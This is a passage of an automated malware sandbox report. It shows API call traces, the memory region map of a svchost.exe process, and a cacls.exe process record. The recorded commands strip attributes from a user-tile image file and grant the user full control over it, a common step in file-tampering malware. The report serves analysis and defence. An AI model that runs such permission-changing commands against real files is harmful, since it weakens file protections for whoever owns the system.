| out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\"", lpProcessInformation=0x1cf498*(hProcess=0x4c, hThread=0x50, dwProcessId=0xa10, dwThreadId=0xc38)) returned 1 [0181.784] CloseHandle (hObject=0x50) returned 1 [0181.784] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0181.784] GetEnvironmentStringsW () returned 0x3b2410* [0181.784] FreeEnvironmentStringsW (penv=0x3b2410) returned 1 [0181.784] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0181.877] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1cf38c | out: lpExitCode=0x1cf38c*=0x0) returned 1 [0181.877] CloseHandle (hObject=0x4c) returned 1 [0181.877] _vsnwprintf (in: _Buffer=0x1cf4d4, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf398 | out: _Buffer="00000000") returned 8 [0181.877] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0181.877] GetEnvironmentStringsW () returned 0x3b2410* [0181.877] FreeEnvironmentStringsW (penv=0x3b2410) returned 1 [0181.877] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0181.877] GetEnvironmentStringsW () returned 0x3b2410* [0181.877] FreeEnvironmentStringsW (penv=0x3b2410) returned 1 [0181.877] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf3f0 | out: lpAttributeList=0x1cf3f0) [0181.877] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.877] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0181.877] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.877] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0181.877] _get_osfhandle (_FileHandle=0) returned 0x3 [0181.877] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0181.877] SetConsoleInputExeNameW () returned 0x1 [0181.878] GetConsoleOutputCP () returned 0x1b5 [0181.878] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0181.878] SetThreadUILanguage (LangId=0x0) returned 0x409 [0181.878] exit (_Code=0) Process: id = "339" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7ea16200" os_pid = "0x3e8" os_integrity_level = "0x4000" os_privileges = "0x60801000" monitor_reason = "rpc_server" parent_id = "337" os_parent_pid = "0xb88" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c2d0" [0xc000000f], "LOCAL" [0x7] Region: id = 25313 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25314 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25315 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25316 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25317 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 25318 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25319 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 25320 start_va = 0x110000 end_va = 0x117fff entry_point = 0x110000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 25321 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 25322 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 25323 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 25324 start_va = 0x170000 end_va = 0x171fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 25325 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 25326 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 25327 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 25328 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 25329 start_va = 0x2d0000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 25330 start_va = 0x3a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 25331 start_va = 0x4b0000 end_va = 0x52ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 25332 start_va = 0x530000 end_va = 0x922fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 25333 start_va = 0x950000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 25334 start_va = 0x990000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 25335 start_va = 0xa70000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 25336 start_va = 0xac0000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 25337 start_va = 0xb70000 end_va = 0xbaffff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 25338 start_va = 0xbb0000 end_va = 0xbeffff entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 25339 start_va = 0xbf0000 end_va = 0xc2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 25340 start_va = 0xc30000 end_va = 0xefefff entry_point = 0xc30000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 25341 start_va = 0xf00000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 25342 start_va = 0x1010000 end_va = 0x104ffff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 25343 start_va = 0x1070000 end_va = 0x10affff entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 25344 start_va = 0x10d0000 end_va = 0x110ffff entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 25345 start_va = 0x1120000 end_va = 0x115ffff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 25346 start_va = 0x11a0000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 25347 start_va = 0x11b0000 end_va = 0x12affff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 25348 start_va = 0x12b0000 end_va = 0x13affff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 25349 start_va = 0x13f0000 end_va = 0x13fffff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 25350 start_va = 0x1400000 end_va = 0x14bffff entry_point = 0x1400000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 25351 start_va = 0x15e0000 end_va = 0x15effff entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 25352 start_va = 0x1680000 end_va = 0x16bffff entry_point = 0x0 region_type = private name = "private_0x0000000001680000" filename = "" Region: id = 25353 start_va = 0x16c0000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 25354 start_va = 0x17a0000 end_va = 0x17dffff entry_point = 0x0 region_type = private name = "private_0x00000000017a0000" filename = "" Region: id = 25355 start_va = 0x17e0000 end_va = 0x181ffff entry_point = 0x0 region_type = private name = "private_0x00000000017e0000" filename = "" Region: id = 25356 start_va = 0x6e2d0000 end_va = 0x6e319fff entry_point = 0x6e2d0000 region_type = mapped_file name = "w32time.dll" filename = "\\Windows\\System32\\w32time.dll" (normalized: "c:\\windows\\system32\\w32time.dll") Region: id = 25357 start_va = 0x6e5a0000 end_va = 0x6e5acfff entry_point = 0x6e5a0000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 25358 start_va = 0x6e5b0000 end_va = 0x6e5b2fff entry_point = 0x6e5b0000 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 25359 start_va = 0x6e5c0000 end_va = 0x6e5d1fff entry_point = 0x6e5c0000 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 25360 start_va = 0x6e5e0000 end_va = 0x6e66ffff entry_point = 0x6e5e0000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 25361 start_va = 0x6e700000 end_va = 0x6e707fff entry_point = 0x6e700000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 25362 start_va = 0x6e8a0000 end_va = 0x6e8f9fff entry_point = 0x6e8a0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 25363 start_va = 0x6f290000 end_va = 0x6f2f0fff entry_point = 0x6f290000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 25364 start_va = 0x6f8d0000 end_va = 0x6f8e1fff entry_point = 0x6f8d0000 region_type = mapped_file name = "vmictimeprovider.dll" filename = "\\Windows\\System32\\vmictimeprovider.dll" (normalized: "c:\\windows\\system32\\vmictimeprovider.dll") Region: id = 25365 start_va = 0x6fcf0000 end_va = 0x6fd3efff entry_point = 0x6fcf0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 25366 start_va = 0x6fd40000 end_va = 0x6fd97fff entry_point = 0x6fd40000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 25367 start_va = 0x6fff0000 end_va = 0x70004fff entry_point = 0x6fff0000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 25368 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 25369 start_va = 0x718b0000 end_va = 0x718fbfff entry_point = 0x718b0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 25370 start_va = 0x71f60000 end_va = 0x71f67fff entry_point = 0x71f60000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 25371 start_va = 0x71f70000 end_va = 0x71f81fff entry_point = 0x71f70000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 25372 start_va = 0x733c0000 end_va = 0x733cffff entry_point = 0x733c0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 25373 start_va = 0x73670000 end_va = 0x73681fff entry_point = 0x73670000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 25374 start_va = 0x73690000 end_va = 0x7369cfff entry_point = 0x73690000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 25375 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 25376 start_va = 0x737a0000 end_va = 0x737a7fff entry_point = 0x737a0000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 25377 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 25378 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 25379 start_va = 0x73820000 end_va = 0x73866fff entry_point = 0x73820000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 25380 start_va = 0x73880000 end_va = 0x73888fff entry_point = 0x73880000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 25381 start_va = 0x738f0000 end_va = 0x738fffff entry_point = 0x738f0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 25382 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 25383 start_va = 0x748d0000 end_va = 0x748d8fff entry_point = 0x748d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 25384 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 25385 start_va = 0x74a10000 end_va = 0x74a25fff entry_point = 0x74a10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 25386 start_va = 0x74a30000 end_va = 0x74a46fff entry_point = 0x74a30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 25387 start_va = 0x74b20000 end_va = 0x74b27fff entry_point = 0x74b20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 25388 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 25389 start_va = 0x74ca0000 end_va = 0x74cc1fff entry_point = 0x74ca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 25390 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 25391 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 25392 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 25393 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 25394 start_va = 0x75060000 end_va = 0x75070fff entry_point = 0x75060000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 25395 start_va = 0x75290000 end_va = 0x75297fff entry_point = 0x75290000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 25396 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 25397 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 25398 start_va = 0x752e0000 end_va = 0x7533efff entry_point = 0x752e0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 25399 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 25400 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 25401 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25402 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25403 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 25404 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 25405 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25406 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25407 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 25408 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25409 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25410 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25411 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25412 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 25413 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 25414 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25415 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 25416 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25417 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 25418 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25419 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25420 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25421 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25422 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 25423 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 25424 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 25425 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 25426 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 25427 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25428 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 25429 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 25430 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 25431 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 25432 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 25433 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 25434 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 25435 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 25436 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 469 os_tid = 0x8c0 Thread: id = 470 os_tid = 0x490 Thread: id = 471 os_tid = 0x32c Thread: id = 472 os_tid = 0x2a8 Thread: id = 473 os_tid = 0x6d4 Thread: id = 474 os_tid = 0x718 Thread: id = 475 os_tid = 0x124 Thread: id = 476 os_tid = 0x7bc Thread: id = 477 os_tid = 0x7a8 Thread: id = 478 os_tid = 0x7a4 Thread: id = 479 os_tid = 0x414 Thread: id = 480 os_tid = 0x400 Thread: id = 481 os_tid = 0x3ec Thread: id = 482 os_tid = 0xa1c Thread: id = 483 os_tid = 0xbd4 Thread: id = 898 os_tid = 0xc04 Thread: id = 899 os_tid = 0x62c Thread: id = 939 os_tid = 0xe44 Thread: id = 950 os_tid = 0xed4 Process: id = "340" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16a80" os_pid = "0xcd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "338" os_parent_pid = "0xcfc" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25465 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25466 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 25467 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 25468 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 25469 start_va = 0x7d0000 end_va = 0x7d8fff entry_point = 0x7d0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 25470 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 